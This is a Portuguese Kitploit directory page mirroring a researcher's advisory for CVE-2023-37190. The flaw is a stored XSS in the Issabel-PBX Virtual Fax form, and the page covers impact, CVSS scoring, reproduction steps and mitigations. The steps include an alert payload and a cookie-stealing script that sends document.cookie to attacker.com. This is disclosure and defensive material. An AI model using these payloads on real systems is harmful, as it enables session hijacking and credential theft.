Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-37190 — Existe uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado no Issabel-PBX versão 4.0.0-6. A aplicação não sanitiza e codifica adequadamente a entrada fornecida pelo usuário antes de armazená-la no banco de dados e posteriormente renderizá-la na interface web. | Kitploit
Ferramentas/GitHubGitHub/sahiloj/cve-2023-37190
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebPapers e PesquisaAprendizado e Educação
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Existe uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado no Issabel-PBX versão 4.0.0-6. A aplicação não sanitiza e codifica adequadamente a entrada fornecida pelo usuário antes de armazená-la no banco de dados e posteriormente renderizá-la na interface web.

Ver Repositório
11há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-37190 — Issabel-PBX 4.0.0-6: Cross-Site Scripting Armazenado (XSS)

CVE Severity Type Affected Version


📋 Visão Geral

CampoDetalhes
CVE IDCVE-2023-37190
VulnerabilidadeCross-Site Scripting Armazenado (XSS)
Produto AfetadoIssabel-PBX
Versão Afetada4.0.0-6
SeveridadeMédia (CVSS v3.1 Pontuação: 5.4)
Descoberto PorSahil Ojha
Data de Divulgação07 Julho 2023
FornecedorIssabel
Código FonteIssabelFoundation/issabelPBX
Testado EmWindows

📝 Descrição

Uma vulnerabilidade de Cross-Site Scripting Armazenado (XSS) existe no Issabel-PBX versão 4.0.0-6. A aplicação não sanitiza e codifica adequadamente a entrada fornecida pelo usuário antes de armazená-la no banco de dados e posteriormente renderizá-la na interface web.

A vulnerabilidade está presente no módulo Virtual Fax, especificamente no formulário de criação "New Virtual Fax". Dois parâmetros de entrada — Virtual Fax Name e Caller ID Name — não passam por validação de entrada ou codificação de saída adequadas. Isso permite que um atacante autenticado com privilégios baixos injete e armazene permanentemente um payload malicioso de JavaScript na aplicação.

Uma vez armazenado, o script malicioso é automaticamente executado no navegador de qualquer usuário (incluindo administradores) que visite a página afetada, sem qualquer interação adicional necessária por parte do atacante.


⚠️ Impacto

Um atacante que explore com sucesso esta vulnerabilidade pode:

  • Roubar cookies de sessão e sequestrar sessões de usuários autenticados, incluindo contas de administrador.
  • Realizar ações em nome das vítimas, como alterar configurações, adicionar usuários ou modificar definições do sistema.
  • Redirecionar usuários para páginas de phishing ou distribuição de malware controladas pelo atacante.
  • Desfigurar a interface da aplicação, afetando a experiência do usuário e a confiança.
  • Entregar malware ou explorações de navegador a todos os usuários que acessam a página afetada.
  • Realizar keylogging ou capturar informações sensíveis inseridas na página.

Como o payload é armazenado (persistente), ele afeta todos os usuários que visitarem a página vulnerável até que seja removido — tornando isso mais grave do que um XSS refletido.


🔢 Pontuação CVSS v3.1


🔍 Detalhes da Vulnerabilidade

  • Tipo de Vulnerabilidade: Cross-Site Scripting Armazenado (CWE-79)
  • Componente Afetado: Módulo Virtual Fax → Formulário New Virtual Fax
  • Parâmetros Vulneráveis:
    • Virtual Fax Name
    • Caller ID Name
  • Autenticação Necessária: Sim (usuário autenticado com privilégios baixos)
  • Causa Raiz: Falta de sanitização de entrada e codificação de saída nos parâmetros afetados antes de armazenar no banco de dados e renderizar na interface web.

🛠️ Passos para Reproduzir

Pré-requisitos

  • Uma instância em execução do Issabel-PBX versão 4.0.0-6.
  • Credenciais válidas para uma conta com acesso ao módulo Fax (usuário padrão ou administrador).

Passos para Reproduzir

Passo 1: Faça login na aplicação web Issabel-PBX usando credenciais válidas.

Passo 2: Navegue até Fax → Virtual Fax → New Virtual Fax.

Injete o seguinte payload XSS no campo Virtual Fax Name e/ou Caller ID Name:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

Para uma prova de conceito mais impactante demonstrando roubo de cookies de sessão (nota: em ataques reais, HTTPS é usado para evitar expor cookies roubados em trânsito):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

O formulário preenchido com o payload injetado deve se parecer com a captura de tela abaixo:

Passo 2 - Injetando payload XSS nos campos Virtual Fax Name e Caller ID Name

Passo 3: Clique no botão Save para enviar o formulário. O payload agora está armazenado persistentemente no banco de dados da aplicação.

Passo 4: Navegue até a página de listagem do Virtual Fax (ou faça outro usuário — como um administrador — visitar a página). O script armazenado será executado automaticamente no navegador do visitante, conforme mostrado abaixo:

Passo 4 - Payload XSS armazenado sendo executado no navegador


🩹 Mitigação & Correção

Recomenda-se fortemente que usuários e administradores do Issabel-PBX apliquem as seguintes medidas:

  1. Validação de Entrada: Reforce a validação rigorosa no lado do servidor em todas as entradas fornecidas pelo usuário. Rejeite ou sanitize entradas que contenham caracteres especiais HTML (<, >, ", ', &).
  2. Codificação de Saída: Aplique codificação de saída sensível ao contexto (codificação de entidades HTML) ao renderizar dados fornecidos pelo usuário na interface web para evitar a execução de scripts.
  3. Política de Segurança de Conteúdo (CSP): Implemente um cabeçalho HTTP Content-Security-Policy rigoroso para limitar as fontes das quais scripts podem ser executados, reduzindo o impacto de vulnerabilidades XSS.
  4. Atualização / Patch: Monitore o repositório oficial do Issabel e aplique quaisquer patches de segurança lançados pelo fornecedor.
  5. Menor Privilégio: Restrinja o acesso a módulos sensíveis, como Virtual Fax, apenas aos usuários que realmente precisam, limitando a superfície de ataque.

📚 Referências

  • NVD - CVE-2023-37190
  • Entrada CVE do MITRE
  • Site Oficial do Issabel
  • IssabelFoundation/issabelPBX no GitHub
  • CWE-79: Neutralização Incorreta de Entrada Durante a Geração de Páginas Web ('Cross-site Scripting')
  • OWASP: Cross-Site Scripting (XSS)

👤 Autor

Sahil Ojha
Pesquisador de Segurança
GitHub: @sahiloj


Aviso: Este repositório é destinado apenas para fins educacionais e de divulgação responsável. As informações aqui fornecidas não devem ser usadas para atacar sistemas sem permissão explícita por escrito do proprietário do sistema. O autor não é responsável pelo uso indevido destas informações.

Baixar ferramenta
MétricaValor
Pontuação Base5,4 (Média)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosBaixos
Interação do UsuárioObrigatória
EscopoAlterado
ConfidencialidadeBaixa
IntegridadeBaixa
DisponibilidadeNenhum